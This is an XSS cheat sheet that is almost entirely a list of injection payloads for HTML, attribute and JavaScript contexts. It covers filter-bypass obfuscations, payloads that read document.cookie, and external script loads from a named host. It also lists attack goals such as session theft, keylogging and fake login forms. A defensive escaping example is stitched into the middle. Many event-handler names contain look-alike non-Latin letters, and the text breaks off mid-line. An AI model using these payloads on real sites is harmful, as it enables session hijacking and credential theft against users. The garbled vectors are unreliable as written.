XSS Cheat Sheet
XSS 101
<h1>Hello,<script>alert(1)</script>!</h1>
1. With <script> tag
<script>alert(1)</script>
2. With regular HTML tags
2.1 Event-based
<TAG EVENT=alert(1)>
<body οnlοad=alert(1)>
<img src=1 οnerrοr=alert(1)>
<svg οnlοad=alert(1)>
<x οnmοuseοver=alert(1)>
2.2 Resource-based
<TAG RESOURCE=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<object data=javascript:alert(1)>
<script>alert(document.domain)</script>
2.1. Steal a user session on the vulnerable website (including admins)
2.2. Capture the keys pressed by the user
2.3. Deface the page, serving any type of content
2.4. Trick the user into giving his/her credentials by means of a fake HTML form
2.5. Crash the browser (local denial of service)
2.6. Force download of files
2.7. Redirect user's browser to another website where his/her machine can be compromised by memory exploits
data: URI scheme
data:[<MIME-type>][;charset=<encoding>][;base64],<data>
<script src="data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script>
<script src=data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==></script>
<script src=data:text/html;,alert(document.cookie)></script>
<script src=data:text/html,alert(document.cookie)></script>
<script src=data:,alert(document.cookie)></script>
<script src="data:text/html;base64,YWxlcnQoMSk="></script>
<script src=data:text/html;base64,YWxlcnQoMSk=></script>
<script src=data:text/html;,alert(1)></script>
<script src=data:text/html,alert(1)></script>
<script src=data:,alert(1)></script>
<body><svg><x><script>alert(1)</script></x></svg></body>
<svg><x><script>alert(1)</x>
<svg><a><script>alert(1)</a>
HTML Context Tag Injection
<svg οnlοad=alert(1)>
"><svg οnlοad=alert(1)//
HTML Context Inline Injection
"οnmοuseοver=alert(1)//
"autofocus/οnfοcus=alert(1)//
Javascript Context Code Injection
'-alert(1)-'
'-alert(1)//
Javascript Context Code Injection (escaping the escape)
\'-alert(1)//
Javascript Context Tag Injection
</script><svg οnlοad=alert(1)>
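Defensive counterpart to the context payloads above, as an added example that is not part of the original cheat sheet. The JavaScript below (helper names are hypothetical) runs the JavaScript-context payloads through a quote-only escaper and through a \uXXXX encoder, showing why the "escaping the escape" vector defeats the former, and encodes one HTML-context payload.

```javascript
// Added example; helper names are hypothetical. Payload strings are the ones
// listed in the context sections above.

// HTML text / quoted-attribute context: encode what can close a tag or value.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Naive JS-string escaper: handles the quote but not the backslash.
function naiveJsEscape(s) {
  return String(s).replace(/'/g, "\\'");
}

// Hardened JS-string encoder: every character outside [A-Za-z0-9 ] becomes
// \uXXXX, so quotes, backslashes, "<" and "/" never reach the parser raw.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// True when body, placed between single quotes inside <script>, leaves the
// string literal (unescaped quote, trailing backslash) or closes the block.
function breaksOut(body) {
  if (/<\/script/i.test(body)) return true;
  for (let i = 0; i < body.length; i++) {
    if (body[i] === '\\') {
      if (i === body.length - 1) return true; // would escape the closing quote
      i++;                                    // skip the escaped character
    } else if (body[i] === "'") {
      return true;
    }
  }
  return false;
}

// Run each JavaScript-context payload through both encoders.
function compareJsEncoders() {
  const payloads = ["'-alert(1)-'", "\\'-alert(1)//", "</script><svg onload=alert(1)>"];
  return payloads.map((p) => ({
    payload: p,
    naive: breaksOut(naiveJsEscape(p)),
    hardened: breaksOut(encodeJsString(p)),
  }));
}

console.log(compareJsEncoders());
console.log(encodeHtml('"><svg onload=alert(1)//'));
```

The quote-only escaper contains the first payload but not the other two; the \uXXXX encoder contains all three.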
PHP_SELF Injection
http://DOMAIN/PAGE.php/"><svg οnlοad=alert(1)>
Without Parenthesis
<svg οnlοad=alert`1`>
<svg οnlοad=alert(1)>
<svg οnlοad=alert(1)>
<svg οnlοad=alert(1)>
Filter Bypass Alert Obfuscation
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
Body Tag
<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>
<body οnfοcus=alert(1)>
<body οnhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px οnscrοll=alert(1) id=x>#x
<body οnscrοll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body οnresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src οnlοadstart=alert(1)>
<video οnlοadstart=alert(1)><source>
<input autofocus οnblur=alert(1)>
<keygen autofocus οnfοcus=alert(1)>
<form οnsubmit=alert(1)><input type=submit>
<select οnchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x οnshοw=alert(1)>right click me!
Agnostic Event Handlers
<x contenteditable οnblur=alert(1)>lose focus!
<x οnclick=alert(1)>click this!
<x οncοpy=alert(1)>copy this!
<x οncοntextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x οndblclick=alert(1)>double click this!
<x οndrag=alert(1)>drag this!
<x contenteditable οnfοcus=alert(1)>focus this!
<x contenteditable οninput=alert(1)>input here!
<x contenteditable οnkeydοwn=alert(1)>press any key!
<x contenteditable οnkeypress=alert(1)>press any key!
<x contenteditable οnkeyup=alert(1)>press any key!
<x οnmοusedοwn=alert(1)>click this!
<x οnmοusemοve=alert(1)>hover this!
<x οnmοuseοut=alert(1)>hover this!
<x οnmοuseοver=alert(1)>hover this!
<x οnmοuseup=alert(1)>click this!
<x contenteditable οnpaste=alert(1)>paste here!
Agnostic Event Handlers
<brute contenteditable οnblur=alert(1)>lose focus!
<brute οnclick=alert(1)>click this!
<brute οncοpy=alert(1)>copy this!
<brute οncοntextmenu=alert(1)>right click this!
<brute oncut=alert(1)>copy this!
<brute οndblclick=alert(1)>double click this!
<brute οndrag=alert(1)>drag this!
<brute contenteditable οnfοcus=alert(1)>focus this!
<brute contenteditable οninput=alert(1)>input here!
<brute contenteditable οnkeydοwn=alert(1)>press any key!
<brute contenteditable οnkeypress=alert(1)>press any key!
<brute contenteditable οnkeyup=alert(1)>press any key!
<brute οnmοusedοwn=alert(1)>click this!
<brute οnmοusemοve=alert(1)>hover this!
<brute οnmοuseοut=alert(1)>hover this!
<brute οnmοuseοver=alert(1)>hover this!
<brute οnmοuseup=alert(1)>click this!
<brute contenteditable οnpaste=alert(1)>paste here!
<brute style=font-size:500px οnmοuseοver=alert(1)>0000
<brute style=font-size:500px οnmοuseοver=alert(1)>0001
<brute style=font-size:500px οnmοuseοver=alert(1)>0002
<brute style=font-size:500px οnmοuseοver=alert(1)>0003
Code Reuse Inline Script
<script>alert(1)//
<script>alert(1)<!--
Code Reuse Regular Script
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
Filter Bypass Generic Tag + Handler
Encoding
<x onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
Mixed Case
<X onxxx=1
<x OnXxx=1
<X